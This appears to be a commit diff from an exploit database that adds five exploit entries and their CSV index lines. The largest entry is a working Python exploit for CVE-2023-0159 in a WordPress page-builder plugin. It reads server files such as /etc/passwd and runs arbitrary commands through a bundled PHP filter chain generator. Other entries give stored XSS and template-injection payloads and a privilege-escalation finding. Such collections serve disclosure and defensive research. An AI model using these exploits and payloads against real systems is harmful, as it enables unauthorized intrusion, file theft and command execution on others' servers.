DB: 2025-03-20

6 changes to exploits/shellcodes/ghdb Gitea 1.24.0 - HTML Injection Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE) Loaded Commerce 6.6 - Client-Side Template Injection(CSTI) TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated) VeeVPN 1.6.1 - Unquoted Service Path
2025-03-20 00:16:32 +00:00 · 2025-03-20 00:16:32 +00:00 · 04fa5ba95d
commit 04fa5ba95d
parent b42ec1de46
6 changed files with 364 additions and 0 deletions
--- a/exploits/multiple/webapps/52087.txt
+++ b/exploits/multiple/webapps/52087.txt
@ -0,0 +1,45 @@
+# Exploit Title: Gitea 1.24.0 - HTML Injection
+# Date: 2025-03-09
+# Exploit Author: Mikail KOCADAĞ
+# Vendor Homepage: https://gitea.com
+# Software Link: https://dl.gitea.io/gitea/1.24.0/
+# Version: 1.24.0
+# Tested on: Windows 10, Linux Ubuntu 22.04
+# CVE : N/A
+
+## Vulnerability Description:
+In Gitea 1.24.0, the "description" parameter on the user settings page is vulnerable to HTML Injection and potentially Reflected XSS. The user-supplied HTML content is not properly sanitized, allowing it to be executed in the browser. When a user saves their profile description containing malicious HTML or JavaScript code, the payload successfully executes, confirming the vulnerability.
+
+## Exploit PoC:
+[https://lh7-rt.googleusercontent.com/docsz/AD_4nXeh7FQb3EdM3-fPqRLqZ4Oh5JlVQdHjhBHEtPL5U9mEtTeWwiMdfx1SpyYC-Kg7EiWCy-Mpay8ZKz6WDw5hCYLrbCrAN2Dlg5xAnNIMuL9ui8ZNjH9GzD_rwdtjbGRkyoTP-uAd?key=pDzgPVQKg3NL0T6shAZ0U6Xz][https://lh7-rt.googleusercontent.com/docsz/AD_4nXc-OZUDyqxfXQV92GwjmahRYFv7BzYhJ5lG2F6slXNyRVRcgyB2yNbK_NMkFkWbU6IggK4xOkUDP5aukMiEjFS18zIc3DDUR7M0wivQMF2aWRt91yx_ayb7AB556Uot1LVUaa1z8w?key=pDzgPVQKg3NL0T6shAZ0U6Xz]
+
+## Paload:<h1>deneme</h1>
+### **1. Request:**
+POST /user/settings HTTP/2
+Host: demo.gitea.com
+Cookie: _gid=GA1.2.1249205656.1740139988; _ga=GA1.2.291185928.1740139987; i_like_gitea=d9da795e317a0ced; lang=tr-TR; _ga_WBKVZF2YXD=GS1.1.1740139987.1.1.1740140041.6.0.0; _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
+Content-Length: 312
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Accept-Language: tr-TR,tr;q=0.9
+Origin: null
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate, br
+Priority: u=0, i
+
+_csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ
+&full_name=Abuzettin
+&description=%3Ch1%3Edeneme%3C%2Fh1%3E
+&website=
+&location=
+&visibility=0
+&keep_email_private=on
--- a/exploits/php/webapps/52084.txt
+++ b/exploits/php/webapps/52084.txt
@ -0,0 +1,15 @@
+# Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection(CSTI)
+# Date: 03/13/2025
+# Exploit Author: tmrswrr
+# Vendor Homepage: https://loadedcommerce.com/
+# Version: 6.6
+# Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce
+
+Injecting {{7*7}} into the search parameter
+https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}}
+returns 49, confirming a template injection vulnerability.
+
+Forgot Password:
+Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page
+https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process
+triggers an alert, demonstrating client-side code execution.
--- a/exploits/php/webapps/52085.py
+++ b/exploits/php/webapps/52085.py
@ -0,0 +1,249 @@
+# Exploit Title: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
+# Date: 12 march 2025
+# Exploit Author: Ravina
+# Vendor Homepage: wprealize
+# Version: 1.9.1
+# Tested on: windows, linux
+# CVE ID : CVE-2023-0159
+# Vulnerability Type: Remote Code Execution
+
+------------------------------------------------
+# CVE-2023-0159_scan.py
+
+#!/usr/bin/env python3
+# LFI: ./exploit.py --mode lfi --target https://vuln-site.com --file /etc/passwd
+# RCE: ./exploit.py --mode rce --target https://vuln-site.com --command "id" --generator /path/to/php_filter_chain_generator.py
+
+import argparse
+import requests
+import base64
+import subprocess
+import time
+import php_filter_chain_generator
+
+def run_lfi(target, file_path):
+    url = f"{target}/wp-admin/admin-ajax.php"
+    payload = {
+        'action': 'extensive_vc_init_shortcode_pagination',
+        'options[template]': f'php://filter/convert.base64-encode/resource={file_path}'
+    }
+
+    try:
+        response = requests.post(url, data=payload)
+        if response.status_code == 200 and '{"status":"success","message":"Items are loaded","data":' in response.text:
+            try:
+                json_data = response.json()
+                base64_content = json_data['data']['items']
+                decoded = base64.b64decode(base64_content).decode()
+                print(f"\n[+] Successfully read {file_path}:\n")
+                print(decoded)
+            except Exception as e:
+                print(f"[-] Decoding failed: {str(e)}")
+                print(f"Raw response (truncated): {response.text[:500]}...")
+        else:
+            print(f"[-] LFI failed (Status: {response.status_code})")
+    except Exception as e:
+        print(f"[-] Request failed: {str(e)}")
+
+def run_rce(target, command, generator_path):
+    # Base64 encode command to handle special characters
+    encoded_cmd = base64.b64encode(command.encode()).decode()
+    php_code = f'<?php system(base64_decode("{encoded_cmd}")); ?>'
+
+    # Generate filter chain
+    try:
+        result = subprocess.run(
+            [generator_path, '--chain', php_code],
+            capture_output=True,
+            text=True,
+            check=True
+        )
+        payload = None
+        for line in result.stdout.split('\n'):
+            if line.startswith('php://filter'):
+                payload = line.strip()
+                break
+
+        if not payload:
+            print("[-] Failed to generate payload")
+            return
+
+        url = f"{target}/wp-admin/admin-ajax.php"
+        data = {'action': 'extensive_vc_init_shortcode_pagination', 'options[template]': payload}
+
+        print(f"[*] Sending payload for command: {command}")
+        start_time = time.time()
+        # Send the request to attempt RCE and dont forget to pass the generator path
+        response = requests.post(url, data=data)
+        elapsed = time.time() - start_time
+
+        print(f"\n[+] Response time: {elapsed:.2f} seconds")
+        print(f"[+] Status code: {response.status_code}")
+
+        if response.status_code == 200:
+            print("\n[+] Response content:")
+            print(response.text[:1000] + ("..." if len(response.text) > 1000 else ""))
+
+    except subprocess.CalledProcessError as e:
+        print(f"[-] Filter chain generator failed: {e.stderr}")
+    except FileNotFoundError:
+        print(f"[-] Generator not found at {generator_path}")
+    except Exception as e:
+        print(f"[-] RCE failed: {str(e)}")
+
+def main():
+    parser = argparse.ArgumentParser(description="CVE-2023-0159 Exploit Script")
+    parser.add_argument("--mode", choices=["lfi", "rce"], required=True, help="Exploit mode")
+    parser.add_argument("--target", required=True, help="Target URL (e.g., https://example.com)")
+    parser.add_argument("--file", help="File path for LFI mode")
+    parser.add_argument("--command", help="Command to execute for RCE mode")
+    parser.add_argument("--generator", default="php_filter_chain_generator.py",
+                      help="Path to php_filter_chain_generator.py")
+
+    args = parser.parse_args()
+
+    if args.mode == "lfi":
+        if not args.file:
+            print("[-] Missing --file argument for LFI mode")
+            return
+        run_lfi(args.target.rstrip('/'), args.file)
+    elif args.mode == "rce":
+        if not args.command:
+            print("[-] Missing --command argument for RCE mode")
+            return
+        run_rce(args.target.rstrip('/'), args.command, args.generator)
+
+if __name__ == "__main__":
+    main()
+
+------------------------------------------
+
+# php_filter_chain_generator.py
+
+#!/usr/bin/env python3
+import argparse
+import base64
+import re
+
+
+# No need to guess a valid filename anymore
+file_to_use = "php://temp"
+
+conversions = {
+    '0': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2',
+    '1': 'convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4',
+    '2': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921',
+    '3': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE',
+    '4': 'convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE',
+    '5': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2',
+    '6': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2',
+    '7': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4',
+    '8': 'convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
+    '9': 'convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB',
+    'A': 'convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213',
+    'a': 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE',
+    'B': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000',
+    'b': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE',
+    'C': 'convert.iconv.UTF8.CSISO2022KR',
+    'c': 'convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2',
+    'D': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213',
+    'd': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5',
+    'E': 'convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT',
+    'e': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937',
+    'F': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB',
+    'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
+    'g': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8',
+    'G': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90',
+    'H': 'convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213',
+    'h': 'convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE',
+    'I': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213',
+    'i': 'convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000',
+    'J': 'convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4',
+    'j': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16',
+    'K': 'convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE',
+    'k': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2',
+    'L': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC',
+    'l': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE',
+    'M':'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T',
+    'm':'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949',
+    'N': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4',
+    'n': 'convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61',
+    'O': 'convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775',
+    'o': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE',
+    'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
+    'p': 'convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4',
+    'q': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2',
+    'Q': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2',
+    'R': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4',
+    'r': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101',
+    'S': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS',
+    's': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90',
+    'T': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103',
+    't': 'convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS',
+    'U': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943',
+    'u': 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61',
+    'V': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB',
+    'v': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2',
+    'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
+    'w': 'convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE',
+    'X': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932',
+    'x': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS',
+    'Y': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361',
+    'y': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT',
+    'Z': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16',
+    'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
+    '/': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4',
+    '+': 'convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157',
+    '=': ''
+}
+
+def generate_filter_chain(chain, debug_base64 = False):
+
+    encoded_chain = chain
+    # generate some garbage base64
+    filters = "convert.iconv.UTF8.CSISO2022KR|"
+    filters += "convert.base64-encode|"
+    # make sure to get rid of any equal signs in both the string we just generated and the rest of the file
+    filters += "convert.iconv.UTF8.UTF7|"
+
+
+    for c in encoded_chain[::-1]:
+        filters += conversions[c] + "|"
+        # decode and reencode to get rid of everything that isn't valid base64
+        filters += "convert.base64-decode|"
+        filters += "convert.base64-encode|"
+        # get rid of equal signs
+        filters += "convert.iconv.UTF8.UTF7|"
+    if not debug_base64:
+        # don't add the decode while debugging chains
+        filters += "convert.base64-decode"
+
+    final_payload = f"php://filter/{filters}/resource={file_to_use}"
+    return final_payload
+
+def main():
+
+    # Parsing command line arguments
+    parser = argparse.ArgumentParser(description="PHP filter chain generator.")
+
+    parser.add_argument("--chain", help="Content you want to generate. (you will maybe need to pad with spaces for your payload to work)", required=False)
+    parser.add_argument("--rawbase64", help="The base64 value you want to test, the chain will be printed as base64 by PHP, useful to debug.", required=False)
+    args = parser.parse_args()
+    if args.chain is not None:
+        chain = args.chain.encode('utf-8')
+        base64_value = base64.b64encode(chain).decode('utf-8').replace("=", "")
+        chain = generate_filter_chain(base64_value)
+        print("[+] The following gadget chain will generate the following code : {} (base64 value: {})".format(args.chain, base64_value))
+        print(chain)
+    if args.rawbase64 is not None:
+        rawbase64 = args.rawbase64.replace("=", "")
+        match = re.search("^([A-Za-z0-9+/])*$", rawbase64)
+        if (match):
+            chain = generate_filter_chain(rawbase64, True)
+            print(chain)
+        else:
+            print ("[-] Base64 string required.")
+            exit(1)
+
+if __name__ == "__main__":
+    main()
--- a/exploits/php/webapps/52086.txt
+++ b/exploits/php/webapps/52086.txt
@ -0,0 +1,19 @@
+Exploit Title: TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated)
+Date: 10th, March, 2025
+Exploit Author: ABABANK REDTEAM
+Vendor Homepage: https://compassplustechnologies.com/
+Version: 3.2.41.10.26
+Tested on: Window Server 2016
+
+1. Login to web application
+2. Click on `Entire System` goto `Monitoring` then click on `Terminals
+Monitoring`
+3. Select any name below `Terminals Monitoring` then click on `Open Object
+in Tree`
+4. Select on Filter then supply with any filter name then click `Apply
+Filter`
+5. On the right side select on `Save Settings in Explorer Tree`, on the
+`Enter Explorer Item Title` supply the payload <img src=x
+onerror=alert(document.domain)> then click OK.
+
+Payload: <img src=x onerror=alert(document.domain)>
--- a/exploits/windows/local/52088.txt
+++ b/exploits/windows/local/52088.txt
@ -0,0 +1,31 @@
+# Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path
+# Date: 2024-12-27
+# Exploit Author: Doğukan Orhan
+# Vendor Homepage: https://veepn.com/
+# Version: 1.6.1
+# Tested on: Windows 10 Pro x64
+
+
+# Step to discover Unquoted Service Path:
+
+C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname
+
+#Service Info
+
+C:\Users\PC>sc qc VeePNService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VeePNService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\VeePN\service\VeePNService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : VeePNService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+# Exploit:
+
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11916,6 +11916,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
 51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",2022-09-15,samguy,webapps,multiple,,2022-09-15,2023-08-02,1,CVE-2022-30781,,,,,
 52077,exploits/multiple/webapps/52077.txt,"Gitea 1.22.0 - Stored XSS",2024-08-28,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-28,2024-08-28,0,,,,,,
+52087,exploits/multiple/webapps/52087.txt,"Gitea 1.24.0 - HTML Injection",2025-03-19,"Mikail KOCADAĞ",webapps,multiple,,2025-03-19,2025-03-19,0,,,,,,
 44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,,2018-07-10,2018-07-10,0,,,,,,https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html
 49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",2021-01-06,1F98D,webapps,multiple,,2021-01-06,2021-04-01,1,CVE-2019-11229,,,,,
 42392,exploits/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,webapps,multiple,,2017-07-29,2017-07-29,0,,,,,,http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
@ -18291,6 +18292,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",webapps,php,,2012-09-05,2015-08-16,1,OSVDB-126531;OSVDB-126530,,,,,https://www.securityfocus.com/bid/55424/info
 17321,exploits/php/webapps/17321.txt,"Extcalendar 2.0b2 - 'cal_search.php' SQL Injection",2011-05-25,"High-Tech Bridge SA",webapps,php,,2011-05-25,2011-05-25,0,,,,,http://www.exploit-db.comextcal2.0_b2.zip,http://www.htbridge.ch/advisory/sql_injection_in_extcalendar_2.html
 17562,exploits/php/webapps/17562.php,"ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload",2011-07-23,Lagripe-Dz,webapps,php,,2011-07-23,2017-10-20,0,,,,,http://www.exploit-db.comextcal2.0_b2.zip,
+52085,exploits/php/webapps/52085.py,"Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)",2025-03-19,Ravina,webapps,php,,2025-03-19,2025-03-19,0,CVE-2023-0159,,,,,
 39816,exploits/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,webapps,php,,2016-05-16,2016-05-16,0,CVE-2016-4313,,,,http://www.exploit-db.comeXtplorer_2.1.9.zip,http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt
 51067,exploits/php/webapps/51067.txt,"eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)",2023-03-27,ErPaciocco,webapps,php,,2023-03-27,2023-03-27,0,,,,,,
 7525,exploits/php/webapps/7525.txt,"Extract Website - 'Filename' File Disclosure",2008-12-19,"Cold Zero",webapps,php,,2008-12-18,2017-01-05,1,OSVDB-50915;CVE-2008-6334,,,,,
@ -22820,6 +22822,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35444,exploits/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,webapps,php,,2011-03-04,2014-12-03,1,,,,,,https://www.securityfocus.com/bid/46829/info
 6601,exploits/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Local File Inclusion",2008-09-27,dun,webapps,php,,2008-09-26,2016-12-23,1,OSVDB-48613;CVE-2008-4712,,,,http://www.exploit-db.comLnBlog-0.9.0.zip,
 45758,exploits/php/webapps/45758.py,"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution",2018-10-31,"Jakub Palaczynski",webapps,php,,2018-10-31,2018-10-31,0,,"Cross-Site Scripting (XSS)",,,,
+52084,exploits/php/webapps/52084.txt,"Loaded Commerce 6.6 - Client-Side Template Injection(CSTI)",2025-03-19,tmrswrr,webapps,php,,2025-03-19,2025-03-19,0,,,,,,
 34552,exploits/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory",2014-09-07,Breaking.Technology,webapps,php,,2014-09-08,2014-09-08,0,CVE-2014-5140;OSVDB-111211,,,,,http://breaking.technology/advisories/CVE-2014-5140.txt
 48909,exploits/php/webapps/48909.txt,"Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-20,"Akıner Kısa",webapps,php,,2020-10-20,2020-10-20,0,,,,,,
 50402,exploits/php/webapps/50402.txt,"Loan Management System 1.0 - SQLi Authentication Bypass",2021-10-08,"Merve Oral",webapps,php,,2021-10-08,2021-10-08,0,,,,,,
@ -31259,6 +31262,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11155,exploits/php/webapps/11155.txt,"Transload Script - Arbitrary File Upload",2010-01-16,DigitALL,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comtransloader.zip,
 6360,exploits/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,webapps,php,,2008-09-02,,1,OSVDB-49430,,,,,http://www.bugreport.ir/index_51.htm
 8943,exploits/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,webapps,php,,2009-06-11,2016-12-21,1,OSVDB-55385;CVE-2009-2145;OSVDB-55384;OSVDB-55383,,,,,http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html
+52086,exploits/php/webapps/52086.txt,"TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated)",2025-03-19,"ABABANK REDTEAM",webapps,php,,2025-03-19,2025-03-19,0,,,,,,
 36175,exploits/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",webapps,php,,2011-09-28,2015-02-25,1,,,,,,https://www.securityfocus.com/bid/49835/info
 18213,exploits/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution",2011-12-07,EgiX,webapps,php,,2011-12-07,2011-12-14,1,OSVDB-77556,,,,http://www.exploit-db.comtraq-v2.3.zip,
 18239,exploits/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,webapps,php,,2011-12-14,2011-12-14,1,OSVDB-77556,"Metasploit Framework (MSF)",,,,
@ -41948,6 +41952,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31991,exploits/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Local Stack Buffer Overflow",2014-02-28,Provensec,local,windows,,2014-02-28,2014-03-03,1,CVE-2007-2568;OSVDB-36178,,,http://www.exploit-db.com/screenshots/idlt32000/screen-shot-2014-03-03-at-122355.png,http://www.exploit-db.comvcdgear350.zip,
 3727,exploits/windows/local/3727.c,"VCDGear 3.56 Build 050213 - 'FILE' Local Code Execution",2007-04-13,InTeL,local,windows,,2007-04-12,2016-09-30,1,OSVDB-34968;CVE-2007-2062,,,,http://www.exploit-db.comvcdgear356_050213beta.zip,
 19678,exploits/windows/local/19678.c,"VDOLive Player 3.0.2 - Local Buffer Overflow",1999-12-13,UNYUN,local,windows,,1999-12-13,2012-07-08,1,CVE-1999-1007;OSVDB-1164,,,,,https://www.securityfocus.com/bid/872/info
+52088,exploits/windows/local/52088.txt,"VeeVPN 1.6.1 - Unquoted Service Path",2025-03-19,"Doğukan Orhan",local,windows,,2025-03-19,2025-03-19,0,,,,,,
 49641,exploits/windows/local/49641.txt,"Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths",2021-03-12,"Mohammed Alshehri",local,windows,,2021-03-12,2021-03-12,0,,,,,,
 40582,exploits/windows/local/40582.txt,"Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",local,windows,,2016-10-19,2016-10-19,0,,,,,,
 38095,exploits/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - Local Buffer Overflow (SEH/ToLower() Bypass)",2015-09-07,"Robbie Corley",local,windows,,2015-09-07,2015-09-07,1,OSVDB-127268,,,,,